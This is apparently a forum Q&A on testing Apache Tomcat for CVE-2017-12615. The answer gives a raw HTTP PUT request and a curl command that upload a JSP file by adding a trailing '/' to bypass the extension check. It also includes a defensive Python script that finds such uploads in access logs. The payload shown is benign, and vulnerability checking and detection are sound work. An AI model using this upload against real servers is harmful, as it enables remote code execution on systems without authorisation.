0 votes

How can I check the vulnerability for Apache Tomcat 7.0.0 to 7.0.79 (CVE-2017-12615)?

1 Answer

0 votes

You can bypass the file extension check by inserting a '/' character after the filename's extension.

HTTP Request:

PUT /file.jsp/
Host: localhost:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

Expected response if successful:

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit using 'curl':

Create a .jsp file (e.g. testfile.jsp):

<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

cURL command on target server:

curl -X PUT http://localhost:port/testfile.jsp/ -d @- < testfile.jsp

Check the file by browsing to the target address or:

curl http://localhost:port/testfile.jsp

by (169 points)
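For the defender's side of the same check, the request described in the answer above leaves a recognisable line in the Tomcat access log: a PUT to a path whose extension is `.jsp` followed by `/`, answered with a 2xx status. The script below is an added example, not part of the original answer; it assumes the AccessLogValve "common" pattern, the function name `find_jsp_puts` is hypothetical, and the sample log lines are constructed.

```python
import re

# Assumed log format: Tomcat AccessLogValve "common" pattern, %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+$'
)
JSP_EXT = (".jsp", ".jspx")


def find_jsp_puts(lines):
    """Return one finding per PUT request that targets a JSP path."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "PUT":
            continue
        path = m["path"].split("?", 1)[0]
        # The request in the answer appends '/' after the extension, so
        # compare the extension with trailing slashes removed.
        if not path.rstrip("/").lower().endswith(JSP_EXT):
            continue
        findings.append({
            "host": m["host"],
            "time": m["time"],
            "path": path,
            "trailing_slash": path.endswith("/"),
            # A 2xx status means the write was accepted (201 in the answer).
            "written": m["status"].startswith("2"),
        })
    return findings


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [23/Sep/2017:06:36:36 +0000] "PUT /testfile.jsp/ HTTP/1.1" 201 -
192.0.2.10 - - [23/Sep/2017:06:36:40 +0000] "GET /testfile.jsp HTTP/1.1" 200 74
192.0.2.11 - - [23/Sep/2017:07:01:02 +0000] "PUT /upload.jsp/ HTTP/1.1" 403 961
192.0.2.12 - - [23/Sep/2017:07:05:09 +0000] "PUT /docs/readme.txt HTTP/1.1" 201 -
198.51.100.7 - - [23/Sep/2017:07:09:13 +0000] "GET /index.jsp HTTP/1.1" 200 512
""".splitlines()

if __name__ == "__main__":
    for f in find_jsp_puts(SAMPLE_LOG):
        state = "WRITTEN" if f["written"] else "attempted"
        print(f'{state:9} {f["host"]} [{f["time"]}] PUT {f["path"]}')
```

A finding with `written` set to true means a JSP file was accepted by the server and should be located and reviewed on disk; a rejected attempt still shows that the host is being probed.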